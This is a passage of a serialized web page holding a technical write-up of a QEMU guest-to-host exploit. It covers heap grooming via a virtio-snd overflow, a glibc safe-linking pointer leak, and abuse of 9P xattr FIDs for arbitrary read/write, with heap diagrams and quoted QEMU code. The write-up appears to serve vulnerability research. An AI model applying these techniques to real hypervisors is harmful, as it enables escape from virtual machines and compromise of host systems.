",{"type":25,"tag":82,"props":133046,"children":133048},{"className":133047},[],[133049],{"type":31,"value":128192},{"type":31,"value":704},{"type":25,"tag":38,"props":133052,"children":133053},{},[133054,133056,133061,133063,133068],{"type":31,"value":133055},"With the desired heap layout of repeated ",{"type":25,"tag":82,"props":133057,"children":133059},{"className":133058},[],[133060],{"type":31,"value":131746},{"type":31,"value":133062},"-sized ",{"type":25,"tag":82,"props":133064,"children":133066},{"className":133065},[],[133067],{"type":31,"value":131844},{"type":31,"value":133069}," chunks in place, we can then free every other one:",{"type":25,"tag":206,"props":133071,"children":133073},{"code":133072},"               Free                  Free\n+----------+----------+----------+----------+----------+\n|          |..........|          |..........|          |\n| .value A |..........| .value C |..........| .value E |\n|          |..........|          |..........|          |\n+----------+----------+----------+----------+----------+\n",[133074],{"type":25,"tag":82,"props":133075,"children":133076},{"__ignoreMap":7},[133077],{"type":31,"value":133072},{"type":25,"tag":38,"props":133079,"children":133080},{},[133081,133083,133088],{"type":31,"value":133082},"We then allocate the overflowing virtio-snd buffer into one of those holes, start the stream, and let it overflow into the size field of the ",{"type":25,"tag":82,"props":133084,"children":133086},{"className":133085},[],[133087],{"type":31,"value":131844},{"type":31,"value":133089}," chunk directly next to it:",{"type":25,"tag":206,"props":133091,"children":133093},{"code":133092},"           +----------+\n           |          |              Free\n+----------|  buffer  |----------+----------+----------+\n|          |          |          |..........|          |\n| .value A +----------+ .value C |..........| .value E |\n|          |          |          |..........|          |\n+----------+          +----------+----------+----------+\n",[133094],{"type":25,"tag":82,"props":133095,"children":133096},{"__ignoreMap":7},[133097],{"type":31,"value":133092},{"type":25,"tag":38,"props":133099,"children":133100},{},[133101,133103,133108,133110,133115],{"type":31,"value":133102},"After the overflow, the virtio-snd buffer is freed by QEMU. We then refill all of the holes created for the virtio-snd buffer by allocating new ",{"type":25,"tag":82,"props":133104,"children":133106},{"className":133105},[],[133107],{"type":31,"value":131746},{"type":31,"value":133109},"-sized chunks in their place. At that point, we are left with a layout similar to the original one, except that one ",{"type":25,"tag":82,"props":133111,"children":133113},{"className":133112},[],[133114],{"type":31,"value":131844},{"type":31,"value":133116}," chunk now has a corrupted and likely oversized size field:",{"type":25,"tag":206,"props":133118,"children":133120},{"code":133119},"                      Oversized chunk\n                             |\n                      +------+------+\n                      |             |\n                      v             v\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value X | .value C | .value Y | .value E |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[133121],{"type":25,"tag":82,"props":133122,"children":133123},{"__ignoreMap":7},[133124],{"type":31,"value":133119},{"type":25,"tag":38,"props":133126,"children":133127},{},[133128,133130,133135],{"type":31,"value":133129},"At this point, we can free the chunks left over from the initial contiguous spray. Because one chunk now has a corrupted, larger size field, freeing it causes a single oversized chunk to be inserted into one of the tcache bins in the range ",{"type":25,"tag":82,"props":133131,"children":133133},{"className":133132},[],[133134],{"type":31,"value":131761},{"type":31,"value":1472},{"type":25,"tag":206,"props":133137,"children":133139},{"code":133138},"                           Free\n                        0x210-0x2f0\n                             |\n                      +------+------+\n   Free               |             |          Free\n   0x200              v             v          0x200\n+----------+----------+----------+----------+----------+\n|..........|          |..........|          |..........|\n|..........| .value X |..........| .value Y |..........|\n|..........|          |..........|          |..........|\n+----------+----------+----------+----------+----------+\n",[133140],{"type":25,"tag":82,"props":133141,"children":133142},{"__ignoreMap":7},[133143],{"type":31,"value":133138},{"type":25,"tag":38,"props":133145,"children":133146},{},[133147,133149,133154],{"type":31,"value":133148},"We then once again fill the remaining holes and recover the oversized chunk by simply allocating every size in the possible range (",{"type":25,"tag":82,"props":133150,"children":133152},{"className":133151},[],[133153],{"type":31,"value":131761},{"type":31,"value":24702},{"type":25,"tag":206,"props":133156,"children":133158},{"code":133157},"                         .value B\n                      +-------------+\n                      |             |\n                      v             v\n+----------+----------+----------+--+-------+----------+\n|          |          |          |//|       |          |\n| .value A | .value X |          |//|       | .value C |\n|          |          |          |//|       |          |\n+----------+----------+----------+--+-------+----------+\n                                 ^          ^\n                                 |          |\n                                 +----------+\n                                   .value Y\n",[133159],{"type":25,"tag":82,"props":133160,"children":133161},{"__ignoreMap":7},[133162],{"type":31,"value":133157},{"type":25,"tag":38,"props":133164,"children":133165},{},[133166,133168,133174],{"type":31,"value":133167},"After reclaiming it, we use that chunk to overwrite the size of the next chunk again, but this time we set it to ",{"type":25,"tag":82,"props":133169,"children":133171},{"className":133170},[],[133172],{"type":31,"value":133173},"0x400",{"type":31,"value":133175}," - this gives us a chunk that fully overlaps the chunk next to it, leaving us in the following final state:",{"type":25,"tag":206,"props":133177,"children":133179},{"code":133178},"                                    .value Y extended\n                                            |\n                                 +----------+----------+\n                                 |                     |\n                                 v                     v\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value X | .value B | .value Y | .value C |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[133180],{"type":25,"tag":82,"props":133181,"children":133182},{"__ignoreMap":7},[133183],{"type":31,"value":133178},{"type":25,"tag":606,"props":133185,"children":133187},{"id":133186},"leaking-a-heap-address",[133188],{"type":31,"value":133189},"Leaking a Heap Address",{"type":25,"tag":38,"props":133191,"children":133192},{},[133193],{"type":31,"value":133194},"We begin by leaking a heap address, since that is the simplest target at this stage. More specifically, we want the address of a heap chunk whose contents we control. Once we have that, we gain a region of memory at a known address with controlled contents, which is useful for placing fake objects or reclaiming the same location with other objects and later inspecting them with an arbitrary read primitive.",{"type":25,"tag":38,"props":133196,"children":133197},{},[133198,133200,133206],{"type":31,"value":133199},"To do this, we abuse the forward (",{"type":25,"tag":82,"props":133201,"children":133203},{"className":133202},[],[133204],{"type":31,"value":133205},"fd",{"type":31,"value":133207},") pointers used by tcache freelists. Modern glibc protects these pointers with a mitigation known as safe-linking. Instead of storing the next free chunk pointer directly, glibc encodes it by XORing it with the address of the current chunk, shifted right by 12:",{"type":25,"tag":206,"props":133209,"children":133211},{"code":133210},"fd = next ^ (curr >> 12)\n",[133212],{"type":25,"tag":82,"props":133213,"children":133214},{"__ignoreMap":7},[133215],{"type":31,"value":133210},{"type":25,"tag":38,"props":133217,"children":133218},{},[133219,133221,133226,133227,133232],{"type":31,"value":133220},"When a tcache bin is empty and a single chunk is inserted into it, ",{"type":25,"tag":82,"props":133222,"children":133224},{"className":133223},[],[133225],{"type":31,"value":61533},{"type":31,"value":1680},{"type":25,"tag":82,"props":133228,"children":133230},{"className":133229},[],[133231],{"type":31,"value":58464},{"type":31,"value":133233}," because there is no following entry. In that case, the encoding becomes:",{"type":25,"tag":206,"props":133235,"children":133237},{"code":133236},"fd = 0 ^ (curr >> 12)\n",[133238],{"type":25,"tag":82,"props":133239,"children":133240},{"__ignoreMap":7},[133241],{"type":31,"value":133236},{"type":25,"tag":38,"props":133243,"children":133244},{},[133245,133247,133252],{"type":31,"value":133246},"So if we free a single chunk into an empty tcache bin, its ",{"type":25,"tag":82,"props":133248,"children":133250},{"className":133249},[],[133251],{"type":31,"value":133205},{"type":31,"value":133253}," field is effectively just the chunk address shifted right by 12.",{"type":25,"tag":38,"props":133255,"children":133256},{},[133257],{"type":31,"value":133258},"In the overlap we achieved earlier:",{"type":25,"tag":206,"props":133260,"children":133262},{"code":133261},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                                         |\nv                                         v\n+--------------------+--------------------+\n|                    |                    |\n|      .value Y      |      .value C      |\n|                    |                    |\n+--------------------+--------------------+\n",[133263],{"type":25,"tag":82,"props":133264,"children":133265},{"__ignoreMap":7},[133266],{"type":31,"value":133261},{"type":25,"tag":38,"props":133268,"children":133269},{},[133270,133272,133278,133280,133286,133288,133294,133296,133301],{"type":31,"value":133271},"We first free ",{"type":25,"tag":82,"props":133273,"children":133275},{"className":133274},[],[133276],{"type":31,"value":133277},".value C",{"type":31,"value":133279}," into tcache and read its contents through the oversized ",{"type":25,"tag":82,"props":133281,"children":133283},{"className":133282},[],[133284],{"type":31,"value":133285},".value Y",{"type":31,"value":133287},". This gives us ",{"type":25,"tag":82,"props":133289,"children":133291},{"className":133290},[],[133292],{"type":31,"value":133293},".value C >> 12",{"type":31,"value":133295},". That is not yet the exact address of ",{"type":25,"tag":82,"props":133297,"children":133299},{"className":133298},[],[133300],{"type":31,"value":133277},{"type":31,"value":133302},", since the lower 12 bits are lost.",{"type":25,"tag":38,"props":133304,"children":133305},{},[133306,133308,133313,133315,133320,133322,133327,133329,133334],{"type":31,"value":133307},"To recover the exact address of a controlled heap chunk, we reclaim ",{"type":25,"tag":82,"props":133309,"children":133311},{"className":133310},[],[133312],{"type":31,"value":133277},{"type":31,"value":133314},", then free a different controlled chunk into the same tcache bin. After that, we free ",{"type":25,"tag":82,"props":133316,"children":133318},{"className":133317},[],[133319],{"type":31,"value":133277},{"type":31,"value":133321}," again. This time, ",{"type":25,"tag":82,"props":133323,"children":133325},{"className":133324},[],[133326],{"type":31,"value":61533},{"type":31,"value":133328}," is no longer ",{"type":25,"tag":82,"props":133330,"children":133332},{"className":133331},[],[133333],{"type":31,"value":58464},{"type":31,"value":133335},", but instead points to that controlled chunk, so the encoded forward pointer becomes:",{"type":25,"tag":206,"props":133337,"children":133338},{"code":133210},[133339],{"type":25,"tag":82,"props":133340,"children":133341},{"__ignoreMap":7},[133342],{"type":31,"value":133210},{"type":25,"tag":38,"props":133344,"children":133345},{},[133346,133348,133354,133356,133361,133363,133368,133370,133375],{"type":31,"value":133347},"Since we already know ",{"type":25,"tag":82,"props":133349,"children":133351},{"className":133350},[],[133352],{"type":31,"value":133353},"curr >> 12",{"type":31,"value":133355}," from the first leak, we can read the new ",{"type":25,"tag":82,"props":133357,"children":133359},{"className":133358},[],[133360],{"type":31,"value":133205},{"type":31,"value":133362}," value from ",{"type":25,"tag":82,"props":133364,"children":133366},{"className":133365},[],[133367],{"type":31,"value":133277},{"type":31,"value":133369}," and recover the exact address of ",{"type":25,"tag":82,"props":133371,"children":133373},{"className":133372},[],[133374],{"type":31,"value":61533},{"type":31,"value":133376}," by reversing the XOR:",{"type":25,"tag":206,"props":133378,"children":133380},{"code":133379},"next = fd ^ (curr >> 12)\n",[133381],{"type":25,"tag":82,"props":133382,"children":133383},{"__ignoreMap":7},[133384],{"type":31,"value":133379},{"type":25,"tag":38,"props":133386,"children":133387},{},[133388],{"type":31,"value":133389},"This gives us the exact address of a heap chunk whose contents we control.",{"type":25,"tag":606,"props":133391,"children":133393},{"id":133392},"arbitrary-read-and-write",[133394],{"type":31,"value":133395},"Arbitrary Read and Write",{"type":25,"tag":38,"props":133397,"children":133398},{},[133399,133401,133406],{"type":31,"value":133400},"Having a controlled chunk at a known address lets us repurpose ",{"type":25,"tag":82,"props":133402,"children":133404},{"className":133403},[],[133405],{"type":31,"value":133277},{"type":31,"value":133407}," into an arbitrary read/write primitive. To do that, we go back to the 9P device.",{"type":25,"tag":38,"props":133409,"children":133410},{},[133411,133413,133418],{"type":31,"value":133412},"Recall ",{"type":25,"tag":82,"props":133414,"children":133416},{"className":133415},[],[133417],{"type":31,"value":131881},{"type":31,"value":1472},{"type":25,"tag":206,"props":133420,"children":133422},{"code":133421,"language":2254,"meta":7,"className":20473,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n    uint64_t size;\n    V9fsFidState *file_fidp;\n    V9fsFidState *xattr_fidp;\n\n    [...]\n\n    file_fidp = get_fid(pdu, fid);\n\n    [...]\n\n    /* Make the file fid point to xattr */\n    xattr_fidp = file_fidp;\n    xattr_fidp->fs.xattr.len = size;\n    xattr_fidp->fs.xattr.value = g_malloc0(size);\n\n    [...]\n",[133423],{"type":25,"tag":82,"props":133424,"children":133425},{"__ignoreMap":7},[133426,133465,133472,133483,133498,133513,133520,133527,133534,133556,133563,133570,133577,133585,133602,133641,133684,133691],{"type":25,"tag":216,"props":133427,"children":133428},{"class":6922,"line":6923},[133429,133433,133437,133441,133445,133449,133453,133457,133461],{"type":25,"tag":216,"props":133430,"children":133431},{"style":6936},[133432],{"type":31,"value":55013},{"type":25,"tag":216,"props":133434,"children":133435},{"style":6936},[133436],{"type":31,"value":55018},{"type":25,"tag":216,"props":133438,"children":133439},{"style":6964},[133440],{"type":31,"value":131876},{"type":25,"tag":216,"props":133442,"children":133443},{"style":7047},[133444],{"type":31,"value":131881},{"type":25,"tag":216,"props":133446,"children":133447},{"style":6964},[133448],{"type":31,"value":1850},{"type":25,"tag":216,"props":133450,"children":133451},{"style":6936},[133452],{"type":31,"value":55595},{"type":25,"tag":216,"props":133454,"children":133455},{"style":6953},[133456],{"type":31,"value":13773},{"type":25,"tag":216,"props":133458,"children":133459},{"style":6947},[133460],{"type":31,"value":131898},{"type":25,"tag":216,"props":133462,"children":133463},{"style":6964},[133464],{"type":31,"value":7107},{"type":25,"tag":216,"props":133466,"children":133467},{"class":6922,"line":6769},[133468],{"type":25,"tag":216,"props":133469,"children":133470},{"style":6964},[133471],{"type":31,"value":14836},{"type":25,"tag":216,"props":133473,"children":133474},{"class":6922,"line":6778},[133475,133479],{"type":25,"tag":216,"props":133476,"children":133477},{"style":6936},[133478],{"type":31,"value":59581},{"type":25,"tag":216,"props":133480,"children":133481},{"style":6964},[133482],{"type":31,"value":128534},{"type":25,"tag":216,"props":133484,"children":133485},{"class":6922,"line":7005},[133486,133490,133494],{"type":25,"tag":216,"props":133487,"children":133488},{"style":6964},[133489],{"type":31,"value":132023},{"type":25,"tag":216,"props":133491,"children":133492},{"style":6953},[133493],{"type":31,"value":8519},{"type":25,"tag":216,"props":133495,"children":133496},{"style":6964},[133497],{"type":31,"value":132032},{"type":25,"tag":216,"props":133499,"children":133500},{"class":6922,"line":7110},[133501,133505,133509],{"type":25,"tag":216,"props":133502,"children":133503},{"style":6964},[133504],{"type":31,"value":132023},{"type":25,"tag":216,"props":133506,"children":133507},{"style":6953},[133508],{"type":31,"value":8519},{"type":25,"tag":216,"props":133510,"children":133511},{"style":6964},[133512],{"type":31,"value":132048},{"type":25,"tag":216,"props":133514,"children":133515},{"class":6922,"line":7216},[133516],{"type":25,"tag":216,"props":133517,"children":133518},{"emptyLinePlaceholder":16},[133519],{"type":31,"value":7642},{"type":25,"tag":216,"props":133521,"children":133522},{"class":6922,"line":7244},[133523],{"type":25,"tag":216,"props":133524,"children":133525},{"style":6964},[133526],{"type":31,"value":108759},{"type":25,"tag":216,"props":133528,"children":133529},{"class":6922,"line":7257},[133530],{"type":25,"tag":216,"props":133531,"children":133532},{"emptyLinePlaceholder":16},[133533],{"type":31,"value":7642},{"type":25,"tag":216,"props":133535,"children":133536},{"class":6922,"line":7275},[133537,133542,133546,133551],{"type":25,"tag":216,"props":133538,"children":133539},{"style":6964},[133540],{"type":31,"value":133541},"    file_fidp ",{"type":25,"tag":216,"props":133543,"children":133544},{"style":6953},[133545],{"type":31,"value":266},{"type":25,"tag":216,"props":133547,"children":133548},{"style":7047},[133549],{"type":31,"value":133550}," get_fid",{"type":25,"tag":216,"props":133552,"children":133553},{"style":6964},[133554],{"type":31,"value":133555},"(pdu, fid);\n",{"type":25,"tag":216,"props":133557,"children":133558},{"class":6922,"line":7296},[133559],{"type":25,"tag":216,"props":133560,"children":133561},{"emptyLinePlaceholder":16},[133562],{"type":31,"value":7642},{"type":25,"tag":216,"props":133564,"children":133565},{"class":6922,"line":7305},[133566],{"type":25,"tag":216,"props":133567,"children":133568},{"style":6964},[133569],{"type":31,"value":108759},{"type":25,"tag":216,"props":133571,"children":133572},{"class":6922,"line":7557},[133573],{"type":25,"tag":216,"props":133574,"children":133575},{"emptyLinePlaceholder":16},[133576],{"type":31,"value":7642},{"type":25,"tag":216,"props":133578,"children":133579},{"class":6922,"line":7574},[133580],{"type":25,"tag":216,"props":133581,"children":133582},{"style":6927},[133583],{"type":31,"value":133584},"    /* Make the file fid point to xattr */\n",{"type":25,"tag":216,"props":133586,"children":133587},{"class":6922,"line":7591},[133588,133593,133597],{"type":25,"tag":216,"props":133589,"children":133590},{"style":6964},[133591],{"type":31,"value":133592},"    xattr_fidp ",{"type":25,"tag":216,"props":133594,"children":133595},{"style":6953},[133596],{"type":31,"value":266},{"type":25,"tag":216,"props":133598,"children":133599},{"style":6964},[133600],{"type":31,"value":133601}," file_fidp;\n",{"type":25,"tag":216,"props":133603,"children":133604},{"class":6922,"line":7604},[133605,133609,133613,133617,133621,133625,133629,133633,133637],{"type":25,"tag":216,"props":133606,"children":133607},{"style":6947},[133608],{"type":31,"value":132426},{"type":25,"tag":216,"props":133610,"children":133611},{"style":6964},[133612],{"type":31,"value":17714},{"type":25,"tag":216,"props":133614,"children":133615},{"style":6947},[133616],{"type":31,"value":40945},{"type":25,"tag":216,"props":133618,"children":133619},{"style":6964},[133620],{"type":31,"value":179},{"type":25,"tag":216,"props":133622,"children":133623},{"style":6947},[133624],{"type":31,"value":132350},{"type":25,"tag":216,"props":133626,"children":133627},{"style":6964},[133628],{"type":31,"value":179},{"type":25,"tag":216,"props":133630,"children":133631},{"style":6947},[133632],{"type":31,"value":13094},{"type":25,"tag":216,"props":133634,"children":133635},{"style":6953},[133636],{"type":31,"value":6956},{"type":25,"tag":216,"props":133638,"children":133639},{"style":6964},[133640],{"type":31,"value":128534},{"type":25,"tag":216,"props":133642,"children":133643},{"class":6922,"line":7613},[133644,133648,133652,133656,133660,133664,133668,133672,133676,133680],{"type":25,"tag":216,"props":133645,"children":133646},{"style":6947},[133647],{"type":31,"value":132426},{"type":25,"tag":216,"props":133649,"children":133650},{"style":6964},[133651],{"type":31,"value":17714},{"type":25,"tag":216,"props":133653,"children":133654},{"style":6947},[133655],{"type":31,"value":40945},{"type":25,"tag":216,"props":133657,"children":133658},{"style":6964},[133659],{"type":31,"value":179},{"type":25,"tag":216,"props":133661,"children":133662},{"style":6947},[133663],{"type":31,"value":132350},{"type":25,"tag":216,"props":133665,"children":133666},{"style":6964},[133667],{"type":31,"value":179},{"type":25,"tag":216,"props":133669,"children":133670},{"style":6947},[133671],{"type":31,"value":43115},{"type":25,"tag":216,"props":133673,"children":133674},{"style":6953},[133675],{"type":31,"value":6956},{"type":25,"tag":216,"props":133677,"children":133678},{"style":7047},[133679],{"type":31,"value":128105},{"type":25,"tag":216,"props":133681,"children":133682},{"style":6964},[133683],{"type":31,"value":132463},{"type":25,"tag":216,"props":133685,"children":133686},{"class":6922,"line":7636},[133687],{"type":25,"tag":216,"props":133688,"children":133689},{"emptyLinePlaceholder":16},[133690],{"type":31,"value":7642},{"type":25,"tag":216,"props":133692,"children":133693},{"class":6922,"line":7645},[133694],{"type":25,"tag":216,"props":133695,"children":133696},{"style":6964},[133697],{"type":31,"value":108759},{"type":25,"tag":38,"props":133699,"children":133700},{},[133701,133703,133709,133711,133716,133717,133722,133724,133729,133731,133737,133738,133744,133746,133751,133752,133757],{"type":31,"value":133702},"The important detail here is that an xattr FID stores both the backing pointer and its length inside the surrounding ",{"type":25,"tag":82,"props":133704,"children":133706},{"className":133705},[],[133707],{"type":31,"value":133708},"V9fsFidState",{"type":31,"value":133710}," object. In other words, if we can place a ",{"type":25,"tag":82,"props":133712,"children":133714},{"className":133713},[],[133715],{"type":31,"value":133708},{"type":31,"value":5593},{"type":25,"tag":82,"props":133718,"children":133720},{"className":133719},[],[133721],{"type":31,"value":133277},{"type":31,"value":133723}," currently sits, the overlapping ",{"type":25,"tag":82,"props":133725,"children":133727},{"className":133726},[],[133728],{"type":31,"value":133285},{"type":31,"value":133730}," chunk can overwrite ",{"type":25,"tag":82,"props":133732,"children":133734},{"className":133733},[],[133735],{"type":31,"value":133736},"V9fsFidState.fs.xattr.value",{"type":31,"value":1307},{"type":25,"tag":82,"props":133739,"children":133741},{"className":133740},[],[133742],{"type":31,"value":133743},"V9fsFidState.fs.xattr.len",{"type":31,"value":133745},". That would immediately give us arbitrary read and write through ",{"type":25,"tag":82,"props":133747,"children":133749},{"className":133748},[],[133750],{"type":31,"value":132539},{"type":31,"value":1307},{"type":25,"tag":82,"props":133753,"children":133755},{"className":133754},[],[133756],{"type":31,"value":132531},{"type":31,"value":179},{"type":25,"tag":38,"props":133759,"children":133760},{},[133761,133763,133768,133769,133774,133776,133781,133783,133789,133791,133796,133798,133803,133805,133810,133812,133817,133819,133824],{"type":31,"value":133762},"At this point, ",{"type":25,"tag":82,"props":133764,"children":133766},{"className":133765},[],[133767],{"type":31,"value":133277},{"type":31,"value":19401},{"type":25,"tag":82,"props":133770,"children":133772},{"className":133771},[],[133773],{"type":31,"value":131746},{"type":31,"value":133775}," chunk, while ",{"type":25,"tag":82,"props":133777,"children":133779},{"className":133778},[],[133780],{"type":31,"value":133708},{"type":31,"value":133782}," falls into the ",{"type":25,"tag":82,"props":133784,"children":133786},{"className":133785},[],[133787],{"type":31,"value":133788},"0x120",{"type":31,"value":133790}," size class. Before freeing ",{"type":25,"tag":82,"props":133792,"children":133794},{"className":133793},[],[133795],{"type":31,"value":133277},{"type":31,"value":133797},", we therefore use the oversized ",{"type":25,"tag":82,"props":133799,"children":133801},{"className":133800},[],[133802],{"type":31,"value":133285},{"type":31,"value":133804}," chunk to change its size to match ",{"type":25,"tag":82,"props":133806,"children":133808},{"className":133807},[],[133809],{"type":31,"value":133708},{"type":31,"value":133811},". Once ",{"type":25,"tag":82,"props":133813,"children":133815},{"className":133814},[],[133816],{"type":31,"value":133277},{"type":31,"value":133818}," is freed, it is inserted into the ",{"type":25,"tag":82,"props":133820,"children":133822},{"className":133821},[],[133823],{"type":31,"value":133788},{"type":31,"value":133825}," tcache bin.",{"type":25,"tag":206,"props":133827,"children":133829},{"code":133828},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                          Free           |\nv                          0x120          v\n+--------------------+---------------+----+\n|                    |...............|    |\n|      .value Y      |...............|    |\n|                    |...............|    |\n+--------------------+---------------+----+\n",[133830],{"type":25,"tag":82,"props":133831,"children":133832},{"__ignoreMap":7},[133833],{"type":31,"value":133828},{"type":25,"tag":38,"props":133835,"children":133836},{},[133837,133839,133844,133846,133852,133854,133860,133862,133867],{"type":31,"value":133838},"After that, we can simply allocate a new ",{"type":25,"tag":82,"props":133840,"children":133842},{"className":133841},[],[133843],{"type":31,"value":133708},{"type":31,"value":133845}," with a ",{"type":25,"tag":82,"props":133847,"children":133849},{"className":133848},[],[133850],{"type":31,"value":133851},"P9_TWALK",{"type":31,"value":133853}," request and a fresh FID - this reaches ",{"type":25,"tag":82,"props":133855,"children":133857},{"className":133856},[],[133858],{"type":31,"value":133859},"alloc_fid",{"type":31,"value":133861},", which allocates a new ",{"type":25,"tag":82,"props":133863,"children":133865},{"className":133864},[],[133866],{"type":31,"value":133708},{"type":31,"value":1472},{"type":25,"tag":206,"props":133869,"children":133871},{"code":133870,"language":2254,"meta":7,"className":20473,"style":7},"static void coroutine_fn v9fs_walk(void *opaque)\n{\n    V9fsFidState *fidp;\n    V9fsFidState *newfidp = NULL;\n\n    [...]\n\n    if (fid == newfid) {\n        [...]\n    } else {\n        newfidp = alloc_fid(s, newfid);\n        if (newfidp == NULL) {\n            err = -EINVAL;\n            goto out;\n        }\n        newfidp->uid = fidp->uid;\n        v9fs_path_copy(&newfidp->path, &path);\n    }\n\n    [...]\n}\n\nstatic V9fsFidState *alloc_fid(V9fsState *s, int32_t fid)\n{\n    V9fsFidState *f;\n\n    f = g_hash_table_lookup(s->fids, GINT_TO_POINTER(fid));\n    if (f) {\n        /* If fid is already there return NULL */\n        BUG_ON(f->clunked);\n        return NULL;\n    }\n    f = g_new0(V9fsFidState, 1);\n\n    [...]\n",[133872],{"type":25,"tag":82,"props":133873,"children":133874},{"__ignoreMap":7},[133875,133915,133922,133938,133966,133973,133980,133987,134008,134015,134030,134052,134076,134097,134108,134115,134153,134195,134202,134209,134216,134223,134230,134281,134288,134303,134310,134358,134370,134378,134407,134422,134429,134458,134465],{"type":25,"tag":216,"props":133876,"children":133877},{"class":6922,"line":6923},[133878,133882,133886,133890,133895,133899,133903,133907,133911],{"type":25,"tag":216,"props":133879,"children":133880},{"style":6936},[133881],{"type":31,"value":55013},{"type":25,"tag":216,"props":133883,"children":133884},{"style":6936},[133885],{"type":31,"value":55018},{"type":25,"tag":216,"props":133887,"children":133888},{"style":6964},[133889],{"type":31,"value":131876},{"type":25,"tag":216,"props":133891,"children":133892},{"style":7047},[133893],{"type":31,"value":133894},"v9fs_walk",{"type":25,"tag":216,"props":133896,"children":133897},{"style":6964},[133898],{"type":31,"value":1850},{"type":25,"tag":216,"props":133900,"children":133901},{"style":6936},[133902],{"type":31,"value":55595},{"type":25,"tag":216,"props":133904,"children":133905},{"style":6953},[133906],{"type":31,"value":13773},{"type":25,"tag":216,"props":133908,"children":133909},{"style":6947},[133910],{"type":31,"value":131898},{"type":25,"tag":216,"props":133912,"children":133913},{"style":6964},[133914],{"type":31,"value":7107},{"type":25,"tag":216,"props":133916,"children":133917},{"class":6922,"line":6769},[133918],{"type":25,"tag":216,"props":133919,"children":133920},{"style":6964},[133921],{"type":31,"value":14836},{"type":25,"tag":216,"props":133923,"children":133924},{"class":6922,"line":6778},[133925,133929,133933],{"type":25,"tag":216,"props":133926,"children":133927},{"style":6964},[133928],{"type":31,"value":132023},{"type":25,"tag":216,"props":133930,"children":133931},{"style":6953},[133932],{"type":31,"value":8519},{"type":25,"tag":216,"props":133934,"children":133935},{"style":6964},[133936],{"type":31,"value":133937},"fidp;\n",{"type":25,"tag":216,"props":133939,"children":133940},{"class":6922,"line":7005},[133941,133945,133949,133954,133958,133962],{"type":25,"tag":216,"props":133942,"children":133943},{"style":6964},[133944],{"type":31,"value":132023},{"type":25,"tag":216,"props":133946,"children":133947},{"style":6953},[133948],{"type":31,"value":8519},{"type":25,"tag":216,"props":133950,"children":133951},{"style":6964},[133952],{"type":31,"value":133953},"newfidp ",{"type":25,"tag":216,"props":133955,"children":133956},{"style":6953},[133957],{"type":31,"value":266},{"type":25,"tag":216,"props":133959,"children":133960},{"style":6936},[133961],{"type":31,"value":131702},{"type":25,"tag":216,"props":133963,"children":133964},{"style":6964},[133965],{"type":31,"value":6967},{"type":25,"tag":216,"props":133967,"children":133968},{"class":6922,"line":7110},[133969],{"type":25,"tag":216,"props":133970,"children":133971},{"emptyLinePlaceholder":16},[133972],{"type":31,"value":7642},{"type":25,"tag":216,"props":133974,"children":133975},{"class":6922,"line":7216},[133976],{"type":25,"tag":216,"props":133977,"children":133978},{"style":6964},[133979],{"type":31,"value":108759},{"type":25,"tag":216,"props":133981,"children":133982},{"class":6922,"line":7244},[133983],{"type":25,"tag":216,"props":133984,"children":133985},{"emptyLinePlaceholder":16},[133986],{"type":31,"value":7642},{"type":25,"tag":216,"props":133988,"children":133989},{"class":6922,"line":7257},[133990,133994,133999,134003],{"type":25,"tag":216,"props":133991,"children":133992},{"style":6973},[133993],{"type":31,"value":16235},{"type":25,"tag":216,"props":133995,"children":133996},{"style":6964},[133997],{"type":31,"value":133998}," (fid ",{"type":25,"tag":216,"props":134000,"children":134001},{"style":6953},[134002],{"type":31,"value":12528},{"type":25,"tag":216,"props":134004,"children":134005},{"style":6964},[134006],{"type":31,"value":134007}," newfid) {\n",{"type":25,"tag":216,"props":134009,"children":134010},{"class":6922,"line":7275},[134011],{"type":25,"tag":216,"props":134012,"children":134013},{"style":6964},[134014],{"type":31,"value":127971},{"type":25,"tag":216,"props":134016,"children":134017},{"class":6922,"line":7296},[134018,134022,134026],{"type":25,"tag":216,"props":134019,"children":134020},{"style":6964},[134021],{"type":31,"value":19737},{"type":25,"tag":216,"props":134023,"children":134024},{"style":6973},[134025],{"type":31,"value":7268},{"type":25,"tag":216,"props":134027,"children":134028},{"style":6964},[134029],{"type":31,"value":7241},{"type":25,"tag":216,"props":134031,"children":134032},{"class":6922,"line":7305},[134033,134038,134042,134047],{"type":25,"tag":216,"props":134034,"children":134035},{"style":6964},[134036],{"type":31,"value":134037},"        newfidp ",{"type":25,"tag":216,"props":134039,"children":134040},{"style":6953},[134041],{"type":31,"value":266},{"type":25,"tag":216,"props":134043,"children":134044},{"style":7047},[134045],{"type":31,"value":134046}," alloc_fid",{"type":25,"tag":216,"props":134048,"children":134049},{"style":6964},[134050],{"type":31,"value":134051},"(s, newfid);\n",{"type":25,"tag":216,"props":134053,"children":134054},{"class":6922,"line":7557},[134055,134059,134064,134068,134072],{"type":25,"tag":216,"props":134056,"children":134057},{"style":6973},[134058],{"type":31,"value":7222},{"type":25,"tag":216,"props":134060,"children":134061},{"style":6964},[134062],{"type":31,"value":134063}," (newfidp ",{"type":25,"tag":216,"props":134065,"children":134066},{"style":6953},[134067],{"type":31,"value":12528},{"type":25,"tag":216,"props":134069,"children":134070},{"style":6936},[134071],{"type":31,"value":131702},{"type":25,"tag":216,"props":134073,"children":134074},{"style":6964},[134075],{"type":31,"value":18761},{"type":25,"tag":216,"props":134077,"children":134078},{"class":6922,"line":7574},[134079,134084,134088,134092],{"type":25,"tag":216,"props":134080,"children":134081},{"style":6964},[134082],{"type":31,"value":134083},"            err 